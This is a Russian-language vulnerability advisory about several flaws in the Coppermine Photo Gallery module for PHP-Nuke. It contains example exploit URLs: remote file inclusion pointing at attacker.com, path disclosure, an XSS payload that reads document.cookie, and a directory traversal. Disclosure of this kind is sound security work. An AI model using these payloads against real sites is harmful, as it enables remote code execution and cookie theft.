Несколько уязвимостей в Coppermine Photo Gallery

Дата публикации:
02.05.2004
Дата изменения:
17.10.2006
Всего просмотров:
5832
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Coppermine Photo Gallery Module for phpNuke/postNuke 1.x
Уязвимые версии: Coppermine Photo Gallery 1.2.2b, 1.2.0 RC4

Описание: Несколько уязвимостей обнаружено в Coppermine Photo Gallery. Удаленный пользователь может выполнить произвольный PHP код на целевой системе, выполнить XSS нападение и определить инсталляционный путь.

1 PHP including:

http://localhost/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://at tacker.com
http://localhost/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/ma ze/theme.php?THEME_DIR=http://attacker.com
2. Раскрытие инсталляционного пути:
 http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
ht tp://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/coppermine/displayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/coppermine/include/crop.inc.php
3. XSS:
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=fo obar">[xss
code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>
4. Просмотр структуры каталогов (удаленный авторизованный пользователь с PHP-Nuke административными привилегиями):
 http://localhost/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..
Также сообщается, что удаленный авторизованный пользователь с административными привилегиями PHP-Nuke может выполнить произвольные команды оболочки, представляя специально обработанные 'impath' и 'jpeg_qual' параметры конфигурации. Пример см. в источнике сообщения.

URL производителя:http://coppermine.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [Full-Disclosure] [waraxe-2004-SA#026 - Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke]

или введите имя

CAPTCHA